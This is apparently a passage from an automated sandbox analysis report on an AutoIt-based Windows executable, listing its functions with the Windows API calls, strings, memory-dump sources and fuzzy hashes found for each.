                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                                                                                      • Opcode ID: 43635e4837b023dc10addf24cc107a4cae0496b10e9203109f031cfad7ff4359
                                                                                                                                                                                      • Instruction ID: f27856d237af093e8d4627032a1dcd538de1e7e4734f519318af9b85e23ceff0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 43635e4837b023dc10addf24cc107a4cae0496b10e9203109f031cfad7ff4359
                                                                                                                                                                                      • Instruction Fuzzy Hash: 74916C746083019FCB10DF25C485A5AB7F8EFC8715F14885DF89A9B3A2DB31E949CB52
                                                                                                                                                                                      Function 00941050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009410B8
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009410EE
                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009410FF
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00941181
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                      • Opcode ID: af94b24d6690e0d2a48f0f491c7606ed6eda29e34f2021850f895f636c6c54da
                                                                                                                                                                                      • Instruction ID: 64290231262332dc43140a9db2df2d41533a4551beb1c3a106b0dd013c4773d7
                                                                                                                                                                                      • Opcode Fuzzy Hash: af94b24d6690e0d2a48f0f491c7606ed6eda29e34f2021850f895f636c6c54da
                                                                                                                                                                                      • Instruction Fuzzy Hash: CD417C71605208EFDB15DF54CC84FAA7BA9EF88354F1480A9EA09DF245D7B1DD84CBA0
                                                                                                                                                                                      Function 00945A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00945A93
                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00945AAF
                                                                                                                                                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00945AF5
                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009C18F0,00000000), ref: 00945B3E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                                                                                      • Opcode ID: f71ce9fa84e5c8eba2623e63b8e9c07a1850c456ffcc3024240ad3baf6c41d82
                                                                                                                                                                                      • Instruction ID: 594d993ba9e696e596d4fafe0a9c20766488a2da2c534d9c1bd0e971246b1b62
                                                                                                                                                                                      • Opcode Fuzzy Hash: f71ce9fa84e5c8eba2623e63b8e9c07a1850c456ffcc3024240ad3baf6c41d82
                                                                                                                                                                                      • Instruction Fuzzy Hash: A041A371208701AFDB20DF68D884F5AB7E8EF89714F15461EF9A59B2D2D770E804CB62
                                                                                                                                                                                      Function 00960458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00960478
                                                                                                                                                                                        • Part of subcall function 00907F40: _memmove.LIBCMT ref: 00907F8F
                                                                                                                                                                                        • Part of subcall function 0090A2FB: _memmove.LIBCMT ref: 0090A33D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove$BuffCharLower
                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                      • API String ID: 2411302734-567219261
                                                                                                                                                                                      • Opcode ID: 859629a8bb35d4a6c22ba80345e16312191f18e712aaf3ce08cd96851228b81c
                                                                                                                                                                                      • Instruction ID: 80251e2345217e59c9ef9563fa25c2887414071a2c2401076c68fc98e013fad8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 859629a8bb35d4a6c22ba80345e16312191f18e712aaf3ce08cd96851228b81c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B318E74600619AFCF10EF59C991AEEB3B5FF85320B108A29B862972D5DB71E905CF50
                                                                                                                                                                                      Function 0093C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0093C684
                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0093C697
                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 0093C6C7
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$_memmove
                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                      • API String ID: 458670788-1403004172
                                                                                                                                                                                      • Opcode ID: 497f355357774faa8e5bd90e2147b2d9c012897e380dd008e248325f146d1b19
                                                                                                                                                                                      • Instruction ID: 2b6b17e593787055449d82c2ff627bd333de86b72f8ce983149bba61a2950dc1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 497f355357774faa8e5bd90e2147b2d9c012897e380dd008e248325f146d1b19
                                                                                                                                                                                      • Instruction Fuzzy Hash: 302123B1904108BFDB04ABA4DC86EFFB7A8DF81354F104619F422E72E1DB784D0A9B20
                                                                                                                                                                                      Function 00954A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00954A60
                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00954A86
                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00954AB6
                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00954AFD
                                                                                                                                                                                        • Part of subcall function 009556A9: GetLastError.KERNEL32(?,?,00954A2B,00000000,00000000,00000001), ref: 009556BE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1951874230-3916222277
                                                                                                                                                                                      • Opcode ID: 51738f8524ab3a6cc439f73745747be85eccd888af3331b2670015513255915d
                                                                                                                                                                                      • Instruction ID: fb0af7942c6d96c82972c8eb0343d756cf3c8c1a2e41693c4b829ef60fa845d5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 51738f8524ab3a6cc439f73745747be85eccd888af3331b2670015513255915d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C21F2B5540208BFEB51DF66DC84FBF77ECEB88749F00001AF90592240EA648D499770
                                                                                                                                                                                      Function 009038E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0097454E
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • _memset.LIBCMT ref: 00903965
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 009039B5
                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 009039C6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                                      • String ID: Line:
                                                                                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                                                                                      • Opcode ID: ba5fa4e72a6f9b98fb7ad901798a4972bbd39c6df3883e617769b55876d409c3
                                                                                                                                                                                      • Instruction ID: 3f77ac502ac30db9cc44dba157c3d23567deaea36416b649a58c10ea7eb55ec6
                                                                                                                                                                                      • Opcode Fuzzy Hash: ba5fa4e72a6f9b98fb7ad901798a4972bbd39c6df3883e617769b55876d409c3
                                                                                                                                                                                      • Instruction Fuzzy Hash: F331A17141C340AFD721EB60DC41FDB77ECAB95310F40891AF199821E2DB74AA48DB96
                                                                                                                                                                                      Function 00968EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0091C657
                                                                                                                                                                                        • Part of subcall function 0091C619: GetStockObject.GDI32(00000011), ref: 0091C66B
                                                                                                                                                                                        • Part of subcall function 0091C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0091C675
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00968F69
                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00968F70
                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00968F85
                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00968F8D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                                                                                      • Opcode ID: 25d3634e2398bf1b83ea010bb487161cd79a3d7d08ca1f56fa34f458a97d820a
                                                                                                                                                                                      • Instruction ID: 5342fb8062505a43c5afb4c2398ba7c0e381ff43e3eaa5deee7e80a066c914c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 25d3634e2398bf1b83ea010bb487161cd79a3d7d08ca1f56fa34f458a97d820a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E821AE71204209AFEF105F64DC40EBB3BAEEF49364F104B29FA5497191DB71DC50A7A0
                                                                                                                                                                                      Function 0094E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0094E392
                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0094E3E6
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094E3FF
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0099DBF0), ref: 0094E43D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                                                                                      • Opcode ID: 7ace261424fc58357e9489f6e3f8409b0ce7e95fa9f6cdc7ed71387cbecccd00
                                                                                                                                                                                      • Instruction ID: e34a4ac7f66597a3ceda0975ff07a8b29d200b4fa0247e8d931455e24e090c7f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ace261424fc58357e9489f6e3f8409b0ce7e95fa9f6cdc7ed71387cbecccd00
                                                                                                                                                                                      • Instruction Fuzzy Hash: 03215075A40108AFCB10EFA4CD85EEEB7B8EF99714F104069F509E7291D731EA05CB60
                                                                                                                                                                                      Function 0093D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                        • Part of subcall function 0093D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0093D640
                                                                                                                                                                                        • Part of subcall function 0093D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0093D653
                                                                                                                                                                                        • Part of subcall function 0093D623: GetCurrentThreadId.KERNEL32 ref: 0093D65A
                                                                                                                                                                                        • Part of subcall function 0093D623: AttachThreadInput.USER32(00000000), ref: 0093D661
                                                                                                                                                                                      • GetFocus.USER32 ref: 0093D7FB
                                                                                                                                                                                        • Part of subcall function 0093D66C: GetParent.USER32(?), ref: 0093D67A
                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0093D844
                                                                                                                                                                                      • EnumChildWindows.USER32(?,0093D8BA), ref: 0093D86C
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0093D886
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                      • API String ID: 1941087503-1110647743
                                                                                                                                                                                      • Opcode ID: 2dcef82400f3f82fc3d9025b4270630b508ca4351a106c76c512077a53cba145
                                                                                                                                                                                      • Instruction ID: c405685f910226816beb347db815e830151dc02e1b1581202422da4f26b06987
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dcef82400f3f82fc3d9025b4270630b508ca4351a106c76c512077a53cba145
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED1124709012086BDF01BFA0EC96FEA376CAB84708F0040B5FD08AA186DB7469418F30
                                                                                                                                                                                      Function 00961836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009618E4
                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00961917
                                                                                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00961A3A
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00961AB0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2364364464-0
                                                                                                                                                                                      • Opcode ID: 6f595cd64f2ff5fee2550896bb215b8410275abe9bed4216a48aea3230300e48
                                                                                                                                                                                      • Instruction ID: 275daaad5fb7bb7b7a87d0b99a9d3913f4bbd6a526e4d0529cf8a5ae54918466
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f595cd64f2ff5fee2550896bb215b8410275abe9bed4216a48aea3230300e48
                                                                                                                                                                                      • Instruction Fuzzy Hash: 55817374B50204ABDF10EF64C8C6BAD7BE9AF84720F188459F905AF3D2D7B4E9408B90
                                                                                                                                                                                      Function 00960579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009605DF
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0096066E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0096068C
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 009606D2
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 009606EC
                                                                                                                                                                                        • Part of subcall function 0091F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0094AEA5,?,?,00000000,00000008), ref: 0091F282
                                                                                                                                                                                        • Part of subcall function 0091F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0094AEA5,?,?,00000000,00000008), ref: 0091F2A6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 327935632-0
                                                                                                                                                                                      • Opcode ID: 8d94cc70394c6e07f7f960188058e0bfc5085804edc9b0408a1f074a6a033125
                                                                                                                                                                                      • Instruction ID: e290a9b77ff62b8191ea99caf3102dcf049c69cea56bb743279fdf15b4083ea7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d94cc70394c6e07f7f960188058e0bfc5085804edc9b0408a1f074a6a033125
                                                                                                                                                                                      • Instruction Fuzzy Hash: B3516C75A00205DFCB00EFA8C894AAEB7B5FF98310B158155E956AB392DB34ED45CF90
                                                                                                                                                                                      Function 00962D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                        • Part of subcall function 00963AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00962AA6,?,?), ref: 00963B0E
                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00962DE0
                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00962E1F
                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00962E66
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00962E92
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00962E9F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
